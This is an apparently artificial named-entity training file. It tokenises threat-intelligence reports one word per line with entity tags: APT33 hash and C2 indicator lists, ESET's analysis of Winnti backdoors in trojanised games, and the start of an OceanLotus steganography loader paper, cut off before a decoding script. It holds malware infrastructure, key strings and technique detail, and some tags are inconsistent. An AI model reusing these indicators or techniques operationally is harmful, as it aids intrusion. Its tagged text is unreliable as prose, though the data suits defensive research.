d5262f1bc42d7d5d0ebedadd8ab90a88d562c7a90ff9b0aed1b3992ec073e2b0 S-SHA2	Quasar B-MAL
RAT E-MAL
. O

APT33 S-APT
: O
ae1d75a5f87421953372e79c081e4b0a929f65841ed5ea0d380b6289e4a6b565 S-SHA2	Remcos S-MAL
. O

APT33 S-APT
: O
e999fdd6a0f5f8d1ca08cf2aef47f5ddc0ee75879c6f2c1ee23bc31fb0f26c70 S-SHA2	Remcos S-MAL
. O

APT33 S-APT
: O
018360b869d8080cf5bcca1a09eb8251558378eb6479d8d89b8c80a8e2fa328c S-SHA2	Remcos S-MAL
. O

APT33 S-APT
: O
367e78852134ef488ecf6862e71f70a3b10653e642bda3df00dd012c4e130330 S-SHA2	Remcos S-MAL
. O

APT33 S-APT
: O
ea5295868a6aef6aac9e117ef128e9de107817cc69e75f0b20648940724880f3 S-SHA2	Remcos S-MAL
. O

APT33 S-APT
: O
6401abe9b6e90411dc48ffc863c40c9d9b073590a8014fe1b0e6c2ecab2f7e18 S-SHA2	SniffPass S-MAL
. O

APT33 S-APT
: O
bf9c589de55f7496ff14187b1b5e068bd104396c23418a18954db61450d21bab S-SHA2	DarkComet S-MAL
. O

APT33 S-APT
: O
af41e9e058e0a5656f457ad4425a299481916b6cf5e443091c7a6b15ea5b3db3 S-SHA2	DarkComet S-MAL
. O

APT33 S-APT
: O
c7a2559f0e134cafbfc27781acc51217127a7739c67c40135be44f23b3f9d77b S-SHA2	AutoIt B-MAL
FTP E-MAL
tool O
. O

APT33 S-APT
: O
99c1228d15e9a7693d67c4cb173eaec61bdb3e3efdd41ee38b941e733c7104f8 S-SHA2	.NET B-MAL
FTP E-MAL
tool O
. O

APT33 S-APT
: O
94526e2d1aca581121bd79a699a3bf5e4d91a4f285c8ef5ab2ab6e9e44783997 S-SHA2	PowerShell B-MAL
downloader E-MAL
( O
registry.ps1 S-MAL
) O
. O

APT33 S-APT
: O
dedfbc8acf1c7b49fb30af35eda5e23d3f7a202585a5efe82ea7c2a785a95f40 S-SHA2	POSHC2 B-MAL
backdoor E-MAL
. O

APT33 S-APT
: O
95.211.191.117 S-IP
update-sec.com S-DOM
. O

APT33 S-APT
: O
8.26.21.120 S-IP
mynetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
162.250.145.234 S-IP
mynetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
91.235.142.76 S-IP
mywinnetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
8.26.21.119 S-IP
hyperservice.ddns.net S-DOM
. O

APT33 S-APT
: O
8.26.21.120 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
213.252.244.14 S-IP
service-avant.com S-DOM
. O

APT33 S-APT
: O
91.235.142.124 S-IP
mywinnetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
8.26.21.120 S-IP
mynetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
162.250.145.234 S-IP
mynetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
91.235.142.76 S-IP
mywinnetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
8.26.21.120 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
8.26.21.120 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
95.211.191.117 S-IP
update-sec.com S-DOM
. O

APT33 S-APT
: O
5.187.21.70 S-IP
microsoftupdated.com S-DOM
. O

APT33 S-APT
: O
217.13.103.46 S-IP
securityupdated.com S-DOM
. O

APT33 S-APT
: O
8.26.21.120 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
5.187.21.71 S-IP
backupnet.ddns.net S-DOM
. O

APT33 S-APT
: O
91.230.121.143 S-IP
backupnet.ddns.net S-DOM
. O

APT33 S-APT
: O
8.26.21.119 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
8.26.21.117 S-IP
srvhost.servehttp.com S-DOM
. O

APT33 S-APT
: O
37.48.105.178 S-IP
servhost.hopto.org S-DOM
. O

APT33 S-APT
: O
8.26.21.117 S-IP
srvhost.servehttp.com S-DOM
. O

APT33 S-APT
: O
5.187.21.70 S-DOM
microsoftupdated.com S-DOM
. O

APT33 S-APT
: O
64.251.19.214 S-DOM
mynetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
64.251.19.217 S-DOM
[REDACTED].servehttp.com S-DOM
. O

APT33 S-APT
: O
64.251.19.214 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
64.251.19.214 S-IP
mynetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
64.251.19.214 S-IP
[REDACTED].sytes.net S-DOM
. O

APT33 S-APT
: O
64.251.19.217 S-IP
[REDACTED].myftp.org S-DOM
. O

APT33 S-APT
: O
64.251.19.216 S-IP
srvhost.servehttp.com S-DOM
. O

APT33 S-APT
: O
64.251.19.217 S-IP
[REDACTED].myftp.org S-DOM
. O

APT33 S-APT
: O
64.251.19.217 S-IP
[REDACTED].myftp.org S-DOM
. O

APT33 S-APT
: O
64.251.19.215 S-IP
[REDACTED].myftp.org S-DOM
. O

APT33 S-APT
: O
64.251.19.217 S-IP
[REDACTED].myftp.org S-DOM
. O

APT33 S-APT
: O
64.251.19.216 S-IP
[REDACTED].myftp.org S-DOM
. O

APT33 S-APT
: O
64.251.19.232 S-IP
mynetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
64.251.19.214 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
162.250.145.204 S-IP
mynetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
188.165.4.81 S-IP
svcexplores.com S-DOM
. O

APT33 S-APT
: O
64.251.19.231 S-IP
mynetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
64.251.19.231 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
64.251.19.232 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
64.251.19.216 S-IP
[REDACTED].myftp.biz S-DOM
. O

APT33 S-APT
: O
91.230.121.143 S-IP
remote-server.ddns.net S-DOM
. O

APT33 S-APT
: O
162.250.145.222 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
64.251.19.216 S-IP
[REDACTED].redirectme.net S-DOM
. O

APT33 S-APT
: O
8.26.21.222 S-IP
mynetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
8.26.21.223 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
217.147.168.44 S-IP
remserver.ddns.net S-DOM
. O

APT33 S-APT
: O
195.20.52.172 S-IP
mynetwork.cf S-DOM
. O

APT33 S-APT
: O
8.26.21.221 S-IP
mynetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
8.26.21.220 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
8.26.21.221 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
91.230.121.144 S-IP
remserver.ddns.net S-DOM
. O

APT33 S-APT
: O
89.34.237.118 S-IP
mywinnetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
192.119.15.35 S-IP
mynetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
5.79.127.177 S-IP
mypsh.ddns.net S-DOM
. O

APT33 S-APT
: O
192.119.15.35 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
192.119.15.35 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
192.119.15.35 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
192.119.15.36 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
192.119.15.37 S-IP
mynetwork.ddns.net S-DOM
. O

APT33 S-APT
: O
192.119.15.38 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
192.119.15.39 S-IP
remote-server.ddns.net S-DOM
. O

APT33 S-APT
: O
192.119.15.40 S-IP
[REDACTED].ddns.net S-DOM
. O

APT33 S-APT
: O
192.119.15.41 S-IP
mynetwork.cf S-DOM
. O

APT33 S-APT
: O
192.119.15.42 S-IP
[REDACTED].ddns.net S-DOM
. O


gaming O
industry O
scope O
attackers O
asia O
. O

This O
is O
not O
the O
first O
time O
the O
gaming O
industry O
has O
been O
targeted O
by O
attackers O
who O
compromise O
game O
developers O
, O
insert O
backdoors O
into O
a O
game’s O
build O
environment O
, O
and O
then O
have O
their O
malware O
distributed O
as O
legitimate O
software O
. O

In O
April B-TIME
2013 E-TIME
, O
Kaspersky B-SECTEAM
Lab E-SECTEAM
reported O
that O
a O
popular O
game O
was O
altered O
to O
include O
a O
backdoor O
in O
2011 S-TIME
. O

That O
attack O
was O
attributed O
to O
perpetrators O
Kaspersky S-SECTEAM
called O
the O
Winnti S-APT
Group O
. O

Yet O
again O
, O
new O
supply-chain B-ACT
attacks E-ACT
recently O
caught O
the O
attention O
of O
ESET S-SECTEAM
Researchers O
. O

This O
time O
, O
two O
games O
and O
one O
gaming O
platform O
application O
were O
compromised O
to O
include O
a O
backdoor O
. O

Given O
that O
these O
attacks O
were O
mostly O
targeted O
against O
Asia S-LOC
and O
the O
gaming O
industry O
, O
it O
shouldn’t O
be O
surprising O
they O
are O
the O
work O
of O
the O
group O
described O
in O
Kaspersky S-SECTEAM
’s O
“ O
Winnti S-APT
– O
More O
than O
just O
a O
game O
” O
. O

Although O
the O
malware O
uses O
different O
configurations O
in O
each O
case O
, O
the O
three O
affected O
software O
products O
included O
the O
same O
backdoor O
code O
and O
were O
launched O
using O
the O
same O
mechanism O
. O

While O
two O
of O
the O
compromised O
products O
no O
longer O
include O
the O
backdoor O
, O
one O
of O
the O
affected O
developers O
is O
still O
distributing O
the O
trojanized O
version O
: O
ironically O
, O
the O
game O
is O
named O
Infestation O
, O
and O
is O
produced O
by O
Thai S-LOC
developer O
Electronics B-IDTY
Extreme E-IDTY
. O

We O
have O
tried O
informing O
them O
several O
times O
, O
through O
various O
channels O
, O
since O
early O
February S-TIME
, O
but O
without O
apparent O
success O
. O

Let’s O
look O
at O
how O
the O
malicious O
payload O
is O
embedded O
and O
then O
look O
into O
the O
details O
of O
the O
backdoor O
itself O
. O

The O
payload O
code O
is O
started O
very O
early O
during O
the O
execution O
of O
the O
backdoored O
executable O
file O
. O

Right O
after O
the O
PE O
entry O
point O
, O
the O
standard O
call O
to O
the O
C O
Runtime O
initialization O
( O
__scrt_common_main_seh S-TOOL
) O
is O
hooked O
to O
launch O
the O
malicious O
payload O
before O
everything O
else O
. O

This O
may O
suggest O
that O
the O
malefactor O
changed O
a O
build O
configuration O
rather O
than O
the O
source O
code O
itself O
. O

The O
code O
added O
to O
the O
executable O
decrypts O
and O
launches O
the O
backdoor O
in-memory O
before O
resuming O
normal O
execution O
of O
the O
C O
Runtime O
initialization O
code O
and O
all O
the O
subsequent O
code O
of O
the O
host O
application O
. O

The O
embedded O
payload O
data O
has O
a O
specific O
structure O
, O
that O
is O
parsed O
by O
the O
added O
unpacking O
code O
. O

It O
includes O
an O
RC4 B-TOOL
key E-TOOL
( O
which O
is O
XORed B-TOOL
with I-TOOL
0x37 E-TOOL
) O
that O
is O
used O
to O
decrypt O
a O
filename O
and O
the O
embedded O
DLL S-TOOL
file O
. O

The O
actual O
malicious O
payload O
is O
quite O
small O
and O
only O
contains O
about O
17 O
KB O
of O
code O
and O
data O
. O

The O
configuration O
data O
is O
simply O
a O
whitespace-separated O
list O
of O
strings O
. O

The O
configuration O
consists O
of O
four O
fields O
: O

C&C O
server O
URL O
. O

Variable O
( O
t O
) O
used O
to O
determine O
the O
time O
to O
sleep O
in O
milliseconds O
before O
continuing O
the O
execution O
. O

Wait O
time O
is O
chosen O
randomly O
in O
the O
range O
2/3 O
t O
to O
5/3 O
t
. O

A O
string O
identifying O
a O
campaign O
. O

A O
semicolon-separated O
list O
of O
executable O
filenames O
. O

If O
any O
of O
them O
are O
running O
, O
the O
backdoor O
stops O
its O
execution O
. O

ESET S-SECTEAM
researchers O
have O
identified O
five O
versions O
of O
the O
payload O
: O

Winnti S-APT
: O
a045939f O
2018-07-11 B-TIME
15:45:57 E-TIME
https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php S-URL
. O

Winnti S-APT
: O
a260dcf1 O
2018-07-11 B-TIME
15:45:57 E-TIME
https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php S-URL
. O

Winnti S-APT
: O
dde82093 O
2018-07-11 B-TIME
15:45:57 E-TIME
https://bugcheck.xigncodeservice.com/Common/Lib/common.php S-URL
. O

Winnti S-APT
: O
44260a1d O
2018-08-15 B-TIME
10:59:09 E-TIME
https://dump.gxxservice.com/common/up/up_base.php S-URL
. O

Winnti S-APT
: O
8272c1f4 O
2018-11-01 B-TIME
13:16:24 E-TIME
https://nw.infestexe.com/version/last.php S-URL
. O

In O
the O
first O
three O
variants O
, O
the O
code O
was O
not O
recompiled O
, O
but O
the O
configuration O
data O
was O
edited O
in O
the O
DLL S-TOOL
file O
itself O
. O

The O
rest O
of O
the O
content O
is O
a O
byte O
for O
byte O
copy O
. O

Domain O
names O
were O
carefully O
chosen O
to O
look O
like O
they O
are O
related O
to O
the O
game O
or O
application O
publisher O
. O

The O
apex O
domain O
was O
set O
to O
redirect O
to O
a O
relevant O
legitimate O
site O
using O
the O
Namecheap S-TOOL
redirection O
service O
, O
while O
the O
subdomain O
points O
to O
the O
malicious O
C&C O
server O
. O

Winnti S-APT
: O
xigncodeservice.com S-DOM
2018-07-10 B-TIME
09:18:17 E-TIME
https://namu.wiki/w/XIGNCODE S-URL
. O

Winnti S-APT
: O
gxxservice.com S-DOM
2018-08-14 B-TIME
13:53:41 E-TIME
None O
or O
unknown O
. O

Winnti S-APT
: O
infestexe.com S-DOM
2018-11-07 B-TIME
08:46:44 E-TIME
https://www.facebook.com/infest.in.th S-URL
. O

Winnti S-APT
: O
bugcheck.xigncodeservice.com S-DOM
167.99.106.49 S-IP
, O
178.128.180.206 S-IP
DigitalOcean S-IDTY
. O

Winnti S-APT
: O
dump.gxxservice.com S-DOM
142.93.204.230 S-IP
DigitalOcean S-IDTY
. O

Winnti S-APT
: O
nw.infestexe.com S-DOM
138.68.14.195 S-IP
DigitalOcean S-IDTY
. O

At O
the O
time O
of O
writing O
, O
none O
of O
the O
domains O
resolve O
and O
the O
C&C O
servers O
are O
not O
responding O
. O

A O
bot O
identifier O
is O
generated O
from O
the O
machine’s O
MAC O
address O
. O

The O
backdoor O
reports O
information O
about O
the O
machine O
such O
as O
the O
user O
name O
, O
computer O
name O
, O
Windows S-OS
version O
and O
system O
language O
to O
the O
C&C O
server O
and O
awaits O
commands O
. O

The O
data O
is O
XOR S-TOOL
encrypted O
with O
the O
key O
“ O
*&b0i0rong2Y7un1 O
” O
and O
base64-encoded S-ENCR
. O

The O
data O
received O
from O
the O
C&C O
server O
is O
encrypted O
using O
the O
same O
key O
. O

This O
simple O
backdoor O
has O
only O
four O
commands O
that O
can O
be O
used O
by O
the O
attacker O
: O

DownUrlFile O
DownRunUrlFile O
RunUrlBinInMem O
UnInstall O
. O

The O
commands O
are O
pretty O
much O
self-explanatory O
. O

They O
allow O
the O
attacker O
to O
run O
additional O
executables O
from O
a O
given O
URL O
. O

The O
last O
one O
is O
perhaps O
less O
obvious O
. O

The O
UnInstall O
command O
doesn’t O
remove O
the O
malware O
from O
the O
system O
. O

After O
all O
, O
it O
is O
embedded O
inside O
a O
legitimate O
executable O
that O
still O
needs O
to O
run O
. O

Rather O
than O
removing O
anything O
, O
it O
disables O
the O
malicious O
code O
by O
setting O
the O
following O
registry O
value O
to O
1: O
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ImageFlag O
. O

When O
the O
payload O
is O
started O
, O
the O
registry O
value O
is O
queried O
and O
execution O
is O
aborted O
if O
set O
. O

Perhaps O
the O
attackers O
are O
trying O
to O
reduce O
the O
load O
from O
their O
C&C O
servers O
by O
avoiding O
callbacks O
from O
uninteresting O
victims O
. O

Based O
on O
ESET S-SECTEAM
telemetry O
, O
one O
of O
the O
second O
stage O
payload O
delivered O
to O
victims O
is O
Win64/Winnti.BN S-FILE
. O

As O
far O
as O
we O
can O
tell O
, O
its O
dropper O
was O
downloaded O
over O
HTTPS O
from O
api.goallbandungtravel.com S-DOM
. O

We O
have O
seen O
it O
installed O
as O
a O
Windows S-OS
service O
and O
as O
a O
DLL S-TOOL
in O
C:\Windows\System32 O
using O
the O
following O
file O
names O
: O

cscsrv.dll S-FILE
dwmsvc.dll S-FILE
iassrv.dll S-FILE
mprsvc.dll S-FILE
nlasrv.dll S-FILE
powfsvc.dll S-FILE
racsvc.dll S-FILE
slcsvc.dll S-FILE
snmpsvc.dll S-FILE
sspisvc.dll S-FILE
. O

The O
samples O
we O
have O
analyzed O
were O
actually O
quite O
large O
, O
each O
of O
them O
about O
60 O
MB O
. O

This O
is O
, O
however O
, O
only O
for O
appearance O
because O
the O
real O
size O
or O
the O
PE O
file O
is O
between O
63 O
KB O
and O
72 O
KB O
, O
depending O
on O
the O
version O
. O

The O
malware O
files O
simply O
have O
lots O
of O
clean O
files O
appended O
to O
them O
. O

This O
is O
probably O
done O
by O
the O
component O
that O
drops O
and O
installs O
this O
malicious O
service O
. O

Once O
the O
service O
runs O
, O
it O
appends O
the O
extension O
.mui O
to O
its O
DLL S-TOOL
path O
, O
reads O
that O
file O
and O
decrypts O
it O
using O
RC5 S-TOOL
. O

The O
decrypted O
MUI O
file O
contains O
position-independent O
code O
at O
offset O
0 O
. O

The O
RC5 S-TOOL
key O
is O
derived O
from O
the O
hard O
drive O
serial O
number O
and O
the O
string O
“ O
f@Ukd!rCto O
R$. O
” O
— O
we O
were O
not O
able O
to O
obtain O
any O
MUI O
files O
nor O
the O
code O
that O
installs O
them O
in O
the O
first O
place O
. O

Thus O
, O
we O
do O
not O
know O
the O
exact O
purpose O
of O
this O
malicious O
service O
. O

Recent O
versions O
of O
the O
malware O
include O
an O
“ O
auto-update O
” O
mechanism O
, O
using O
C&C O
server O
http://checkin.travelsanignacio.com S-URL
. O

That O
C&C O
server O
served O
the O
latest O
version O
of O
the O
MUI O
files O
encrypted O
with O
a O
static O
RC5 S-TOOL
key O
. O

The O
C&C O
server O
was O
not O
responding O
during O
our O
analysis O
. O

Let’s O
start O
with O
who O
is O
not O
targeted O
. O

Early O
in O
the O
payload O
, O
the O
malware O
checks O
to O
see O
if O
the O
system O
language O
is O
Russian O
or O
Chinese O
. O

In O
either O
case O
, O
the O
malware O
stops O
running O
. O

There O
is O
no O
way O
around O
this O
: O
the O
attackers O
are O
simply O
not O
interested O
in O
computers O
configured O
with O
those O
languages O
. O

ESET S-SECTEAM
telemetry O
shows O
victims O
are O
mostly O
located O
in O
Asia S-LOC
, O
with O
Thailand S-LOC
having O
the O
largest O
part O
of O
the O
pie O
. O

Given O
the O
popularity O
of O
the O
compromised O
application O
that O
is O
still O
being O
distributed O
by O
its O
developer O
, O
it O
wouldn’t O
be O
surprising O
if O
the O
number O
of O
victims O
is O
in O
the O
tens O
or O
hundreds O
of O
thousands O
. O

Supply-chain B-ACT
attacks E-ACT
are O
hard O
to O
detect O
from O
the O
consumer O
perspective O
. O

It O
is O
impossible O
to O
start O
analyzing O
every O
piece O
of O
software O
we O
run O
, O
especially O
with O
all O
the O
regular O
updates O
we O
are O
encouraged O
or O
required O
to O
install O
. O

So O
, O
we O
put O
our O
trust O
in O
software O
vendors O
that O
the O
files O
they O
distribute O
don’t O
include O
malware O
. O

Perhaps O
that’s O
the O
reason O
multiple O
groups O
target O
software O
developers O
: O
compromising O
the O
vendor O
results O
in O
a O
botnet O
as O
popular O
as O
the O
software O
that O
is O
hacked O
. O

However O
, O
there O
is O
a O
downside O
of O
using O
such O
a O
technique O
: O
once O
the O
scheme O
is O
uncovered O
, O
the O
attacker O
loses O
control O
and O
computers O
can O
be O
cleaned O
through O
regular O
updates O
. O

We O
do O
not O
know O
the O
motives O
of O
the O
attackers O
at O
this O
point O
. O

Is O
it O
simply O
financial O
gain? O
Are O
there O
any O
reasons O
why O
the O
three O
affected O
products O
are O
from O
Asian O
developers O
and O
for O
the O
Asian O
market? O
Do O
these O
attackers O
use O
a O
botnet O
as O
part O
of O
a O
larger O
espionage O
operation? O
ESET S-SECTEAM
products O
detect O
this O
threat O
as O
Win32/HackedApp.Winnti.A S-FILE
, O
Win32/HackedApp.Winnti.B S-FILE
, O
the O
payload O
as O
Win32/Winnti.AG S-FILE
, O
and O
the O
second O
stage O
as O
Win64/Winnti.BN S-FILE
. O

Compromised O
file O
samples O
( O
Win32/HackedApp.Winnti.A B-FILE
and I-FILE
B E-FILE
) O

Winnti S-APT
: O
7cf41b1acfb05064518a2ad9e4c16fde9185cd4b S-SHA1
Tue B-TIME
Nov I-TIME
13 I-TIME
10:12:58 I-TIME
2018 E-TIME
1729131071 O
8272c1f4 O
. O

Winnti S-APT
: O
7f73def251fcc34cbd6f5ac61822913479124a2a S-SHA1
Wed B-TIME
Nov I-TIME
14 I-TIME
03:50:18 I-TIME
2018 E-TIME
19317120 O
44260a1d O
. O

Winnti S-APT
: O
dac0bd8972f23c9b5f7f8f06c5d629eac7926269 S-SHA1
Tue B-TIME
Nov I-TIME
27 I-TIME
03:05:16 I-TIME
2018 E-TIME
1729131071 O
8272c1f4 O
. O

Some O
hashes O
were O
redacted O
per O
request O
from O
one O
of O
the O
vendor O
. O

If O
for O
a O
particular O
reason O
you O
need O
them O
, O
reach O
out O
to O
us O
at O
threatintel@eset.com O
. O

Payload O
Samples O
( O
Win32/Winnti.AG S-FILE
) O

Winnti S-APT
: O
a045939f53c5ad2c0f7368b082aa7b0bd7b116da S-SHA1
https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php S-URL
. O

Winnti S-APT
: O
a260dcf193e747cee49ae83568eea6c04bf93cb3 S-SHA1
https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php S-URL
. O

Winnti S-APT
: O
dde82093decde6371eb852a5e9a1aa4acf3b56ba S-SHA1
https://bugcheck.xigncodeservice.com/Common/Lib/common.php S-URL
. O

Winnti S-APT
: O
8272c1f41f7c223316c0d78bd3bd5744e25c2e9f S-SHA1
https://nw.infestexe.com/version/last.php S-URL
. O

Winnti S-APT
: O
44260a1dfd92922a621124640015160e621f32d5 S-SHA1
https://dump.gxxservice.com/common/up/up_base.php S-URL
. O

Second O
stage O
samples O
( O
Win64/Winnti.BN S-FILE
) O

Winnti S-APT
: O
Dropper O
delivered O
by O
api.goallbandungtravel.com S-DOM
. O

Winnti S-APT
: O
4256fa6f6a39add6a1fa10ef1497a74088f12be0 S-SHA1
2018-07-25 B-TIME
10:13:41 E-TIME
None O
. O

Winnti S-APT
: O
bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81 S-SHA1
2018-10-10 B-TIME
09:57:31 E-TIME
http://checkin.travelsanignacio.com S-URL
. O

Winnti S-APT
: O
T1195 O
Supply O
Chain O
Compromise O
. O

Winnti S-APT
: O
T1050 O
New O
Service O
. O

Winnti S-APT
: O
T1022 O
Data O
Encrypted O
. O

Winnti S-APT
: O
T1079 O
Multilayer O
Encryption O
. O

Winnti S-APT
: O
T1032 O
Standard O
Cryptographic O
Protocol O
( O
RC4 S-ENCR
, O
RC5 O
) O
. O

Winnti S-APT
: O
T1043 O
Commonly O
Used O
Port O
( O
80 O
, O
443 O
) O
. O


OceanLotus S-APT
Steganography O
Malware O
Analysis O
White O
Paper O
. O

While O
continuing O
to O
monitor O
activity O
of O
the O
OceanLotus S-APT
APT O
Group O
, O
BlackBerry B-SECTEAM
Cylance E-SECTEAM
researchers O
uncovered O
a O
novel O
payload O
loader O
that O
utilizes O
steganography O
to O
read O
an O
encrypted O
payload O
concealed O
within O
a O
.png O
image O
file O
. O

The O
steganography O
algorithm O
appears O
to O
be O
bespoke O
and O
utilizes O
a O
least O
significant O
bit O
approach O
to O
minimize O
visual O
differences O
when O
compared O
with O
the O
original O
image O
to O
prevent O
analysis O
by O
discovery O
tools O
. O

Once O
decoded O
, O
decrypted O
, O
and O
executed O
, O
an O
obfuscated O
loader O
will O
load O
one O
of O
the O
APT32 S-APT
backdoors O
. O

Thus O
far O
, O
BlackBerry B-SECTEAM
Cylance E-SECTEAM
has O
observed O
two O
backdoors O
being O
used O
in O
combination O
with O
the O
steganography O
loader O
– O
a O
version O
of O
Denes B-MAL
backdoor E-MAL
( O
bearing O
similarities O
to O
the O
one O
described O
by O
ESET S-SECTEAM
) O
, O
and O
an O
updated O
version O
of O
Remy B-MAL
backdoor E-MAL
. O

However O
, O
this O
can O
be O
easily O
modified O
by O
the O
threat O
actor O
to O
deliver O
other O
malicious O
payloads O
. O

The O
complexity O
of O
the O
shellcode O
and O
loaders O
shows O
the O
group O
continues O
to O
invest O
heavily O
in O
development O
of O
bespoke O
tooling O
. O

This O
white O
paper O
describes O
the O
steganography O
algorithm O
used O
in O
two O
distinct O
loader O
variants O
and O
looks O
at O
the O
launcher O
of O
the O
backdoor O
that O
was O
encoded O
in O
one O
of O
the O
.png O
cover O
images O
. O
mcvsocfg.dll S-FILE
: O

ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 S-SHA2
Malware/Backdoor O
659 O
KB O
( O
674 O
, O
816 O
bytes O
) O
PE32 O
executable O
for O
MS O
Windows S-OS
( O
DLL S-TOOL
) O
( O
console O
) O
Intel S-IDTY
80386 O
32-bit O
September B-TIME
2018 E-TIME
. O

This O
particular O
OceanLotus S-APT
malware O
loader O
attempts O
to O
imitate O
McAfee S-S-SECTEAM
’s O
McVsoCfg B-TOOL
DLL E-TOOL
and O
expects O
to O
be O
side-loaded O
by O
the O
legitimate O
" O
On O
Demand O
Scanner O
" O
executable O
. O

It O
arrives O
together O
with O
an O
encrypted O
payload O
stored O
in O
a O
separate O
.png O
image O
file O
. O

The O
.png O
cover O
file O
is O
actually O
a O
valid O
image O
file O
that O
is O
not O
malicious O
on O
its O
own O
. O

The O
payload O
is O
encoded O
inside O
this O
image O
with O
the O
use O
of O
a O
technique O
called O
steganography O
, O
which O
utilizes O
the O
least O
significant O
bits O
of O
each O
pixel’s O
color O
code O
to O
store O
hidden O
information O
, O
without O
making O
overtly O
visible O
changes O
to O
the O
picture O
itself O
. O

The O
encoded O
payload O
is O
additionally O
encrypted O
with O
AES128 S-ENCR
and O
further O
obfuscated O
with O
XOR S-TOOL
in O
an O
attempt O
to O
fool O
steganography O
detection O
tools O
. O

Features O
: O

Side-loaded O
DLL S-TOOL
Loads O
next-stage O
payload O
using O
custom B-TOOL
.png I-TOOL
steganography E-TOOL
Uses O
AES128 S-ENCR
implementation O
from O
Crypto++ B-TOOL
library E-TOOL
for O
payload O
decryption O
Known O
to O
load O
Denes B-MAL
backdoor E-MAL
, O
might O
possibly O
be O
used O
also O
with O
other O
payloads O
. O

The O
malicious O
DLL S-TOOL
exports O
the O
same O
function O
names O
as O
the O
original O
mcvsocfg.dll S-FILE
library O
. O

All O
exports O
contain O
the O
exact O
same O
code O
which O
will O
decrypt O
the O
payload O
, O
inject O
it O
into O
memory O
, O
and O
execute O
it O
. O

The O
payload O
is O
encoded O
inside O
a O
separate O
.png O
file O
using O
a O
technique O
called O
steganography O
. O

On O
top O
of O
that O
, O
the O
decoded O
payload O
is O
also O
encrypted O
with O
AES-128 S-ENCR
and O
finally O
obfuscated O
with O
XOR O
0x3B O
. O

It’s O
worth O
noting O
that O
the O
XOR S-TOOL
key O
is O
not O
hardcoded O
, O
but O
instead O
is O
read O
from O
the O
first O
byte O
of O
the O
C:\Windows\system.ini S-FILE
file O
. O

One O
of O
the O
payloads O
we O
encountered O
was O
encoded O
inside O
an O
image O
of O
Kaito O
Kuroba1 O
, O
the O
gentleman O
thief O
character O
from O
a O
popular O
Japanese O
manga O
series O
. O

To O
extract O
the O
payload O
, O
the O
malware O
will O
first O
initialize O
the O
GDI+ O
API O
and O
get O
the O
image O
width O
and O
height O
values O
. O

The O
size O
of O
the O
payload O
is O
encoded O
within O
the O
first O
four O
pixels O
of O
the O
image O
. O

After O
obtaining O
the O
size O
, O
the O
malware O
will O
allocate O
an O
appropriate O
memory O
buffer O
and O
proceed O
to O
decode O
the O
remaining O
payload O
byte O
by O
byte O
. O

The O
payload O
is O
encoded O
in O
the O
same O
way O
as O
the O
size O
– O
each O
byte O
of O
the O
payload O
is O
computed O
from O
the O
ARGB O
color O
codes O
of O
each O
subsequent O
pixel O
in O
the O
image O
. O

In O
case O
the O
payload O
is O
bigger O
than O
the O
image O
used O
to O
store O
it O
, O
the O
remaining O
payload O
bytes O
are O
simply O
attached O
to O
the O
image O
after O
its O
IEND O
marker O
, O
and O
read O
directly O
from O
the O
file O
. O

The O
pixel O
encoding O
algorithm O
is O
fairly O
straightforward O
and O
aims O
to O
minimize O
visual O
differences O
when O
compared O
to O
the O
original O
image O
by O
only O
modifying O
the O
least O
significant O
bits O
of O
the O
red O
, O
green O
, O
and O
blue O
color O
byte O
values O
. O

The O
alpha O
channel O
byte O
remains O
unchanged O
. O

To O
encode O
a O
byte O
of O
the O
payload O
, O
the O
first O
three O
bits O
( O
0-2 O
) O
are O
stored O
in O
the O
red O
color O
, O
the O
next O
three O
bits O
( O
3-5 O
) O
are O
stored O
in O
the O
green O
color O
, O
and O
the O
final O
two O
bits O
( O
6-7 O
) O
are O
stored O
in O
the O
blue O
color O
. O

Decoding O
is O
a O
simple O
inverse O
operation O
. O

Windows S-OS
converts O
the O
.png O
pixel O
RGBA O
value O
to O
an O
ARGB O
encoding O
via O
the O
GdpiBitmapGetPixel B-TOOL
API E-TOOL
. O

To O
aid O
in O
the O
recovery O
of O
encrypted O
payloads O
, O
the O
following O
Python B-TOOL
script E-TOOL
can O
be O
used O
to O
decode O
